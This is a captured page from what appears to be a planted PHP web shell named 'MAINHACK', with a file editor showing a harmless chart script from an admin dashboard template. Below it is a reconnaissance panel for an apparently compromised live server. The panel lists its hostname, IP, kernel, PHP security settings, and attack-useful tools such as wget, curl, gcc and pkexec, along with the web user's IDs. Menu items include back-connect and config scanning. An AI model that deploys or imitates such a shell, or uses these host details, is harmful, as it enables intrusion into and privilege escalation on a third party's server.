[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: dashboard-demo.js
/* Template Name: Xeloro - Admin & Dashboard Template Author: Myra Studio File: Dashboard */ $(function() { 'use strict'; if ($("#morris-bar-example").length) { Morris.Bar({ element: 'morris-bar-example', barColors: ['#ebeef1', '#00c2b2'], data: [ { y: '2010', a: 80, b: 100 }, { y: '2011', a: 110, b: 130 }, { y: '2012', a: 90, b: 110 }, { y: '2013', a: 80, b: 100 }, { y: '2014', a: 110, b: 130 }, { y: '2015', a: 90, b: 110 }, { y: '2016', a: 120, b: 140 }, { y: '2017', a: 110, b: 125 }, { y: '2018', a: 170, b: 190 }, { y: '2019', a: 120, b: 140 } ], xkey: 'y', ykeys: ['a', 'b'], hideHover: 'auto', gridLineColor: '#eef0f2', resize: true, barSizeRatio: 0.4, labels: ['iPhone 8', 'Samsung Gallexy'] }); } if ($("#morris-donut-example").length) { Morris.Donut({ element: 'morris-donut-example', resize: true, colors: ['#7266bb', '#1d84c6', '#f85359'], data: [{ label: "Samsung Company", value: 12 }, { label: "Apple Company", value: 30 }, { label: "Vivo Mobiles", value: 20 } ] }); } $( document ).ready(function() { var DrawSparkline = function() { $('#sparkline1').sparkline([25, 23, 26, 24, 25, 32, 30, 24, 19], { type: 'line', width: "100%", height: '297', chartRangeMax: 35, lineColor: '#1991eb', fillColor: 'rgba(25,118,210,0.18)', highlightLineColor: 'rgba(0,0,0,.1)', highlightSpotColor: 'rgba(0,0,0,.2)', maxSpotColor:false, minSpotColor: false, spotColor:false, lineWidth: 1 }); } DrawSparkline(); var resizeChart; $(window).resize(function(e) { clearTimeout(resizeChart); resizeChart = setTimeout(function() { DrawSparkline(); }, 300); }); }); if ($('#morris-line-example').length) { Morris.Line({ element: 'morris-line-example', gridLineColor: '#eef0f2', lineColors: ['#f15050', '#e9ecef'], data: [{ y: '2013', a: 80, b: 100 }, { y: '2014', a: 110, b: 130 }, { y: '2015', a: 90, b: 110 }, { y: '2016', a: 120, b: 140 }, { y: '2017', a: 110, b: 125 }, { y: '2018', a: 170, b: 190 }, { y: '2019', a: 120, b: 140 } ], xkey: 'y', ykeys: ['a', 'b'], hideHover: 'auto', resize: true, labels: ['Series A', 'Series B'] }); } });
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: server1.winmanyltd.com
Server IP: 203.161.60.52
PHP Version: 8.3.27
Server Software: Apache
System: Linux server1.winmanyltd.com 4.18.0-553.22.1.el8_10.x86_64 #1 SMP Tue Sep 24 05:16:59 EDT 2024 x86_64
HDD Total: 117.98 GB
HDD Free: 59.81 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
Yes
pkexec:
Yes
git:
Yes
User Info
Username: eliosofonline
User ID (UID): 1002
Group ID (GID): 1003
Script Owner UID: 1002
Current Dir Owner: 1002